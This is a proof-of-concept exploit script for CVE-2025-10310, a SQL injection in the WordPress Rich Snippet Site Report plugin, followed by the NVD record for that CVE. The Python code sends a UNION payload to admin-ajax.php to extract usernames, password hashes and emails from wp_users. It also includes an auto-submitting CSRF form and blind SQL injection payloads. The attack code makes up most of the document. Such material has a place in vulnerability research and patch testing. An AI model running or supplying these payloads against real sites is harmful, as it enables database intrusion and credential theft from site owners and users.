CVE-2025-10310

# CVE-2025-10310 SQL Injection PoC # Vulnerability: SQL Injection via 'last' parameter in Rich Snippet Site Report plugin # Affected: easysnippet plugin versions <= 2.0.0105 import requests # Target WordPress site URL target_url = "http://target-wordpress-site.com" # Vulnerable endpoint vulnerable_endpoint = "/wp-admin/admin-ajax.php" # SQL Injection payload via 'last' parameter # Using UNION-based injection to extract sensitive data sql_payload = "1 UNION SELECT user_login, user_pass, user_email FROM wp_users-- -" # Parameters for the AJAX request params = { "action": "easysnippet_get_data", "last": sql_payload } # Send the malicious request response = requests.post( target_url + vulnerable_endpoint, data=params, headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } ) # Check response for extracted data if response.status_code == 200: print("Response received:") print(response.text) else: print(f"Request failed with status code: {response.status_code}") # Alternative: CSRF-based exploitation csrf_payload = """ <html> <body> <form action="http://target-wordpress-site.com/wp-admin/admin-ajax.php" method="POST" id="csrf-form"> <input type="hidden" name="action" value="easysnippet_get_data" /> <input type="hidden" name="last" value="1 UNION SELECT user_login, user_pass, user_email FROM wp_users-- -" /> </form> <script>document.getElementById('csrf-form').submit();</script> </body> </html> """ # Time-based blind SQL injection payload time_based_payload = "1' AND SLEEP(5)-- -" # Boolean-based blind SQL injection payload boolean_payload = "1' AND 1=1-- -" print("\nPoC payloads ready for testing") print(f"UNION-based: {sql_payload}") print(f"Time-based: {time_based_payload}") print(f"Boolean-based: {boolean_payload}")

{"cve": {"id": "CVE-2025-10310", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:39.967", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Rich Snippet Site Report plugin for WordPress is vulnerable to SQL Injection via the 'last' parameter in all versions up to, and including, 2.0.0105 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This can also be exploited via CSRF."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/easysnippet/tags/2.0.0105/lib/EasySnippet.php#L100", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/easysnippet/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2242c86e-c769-4104-b266-0cdcd90ccf63?source=cve", "source": "[email protected]"}]}}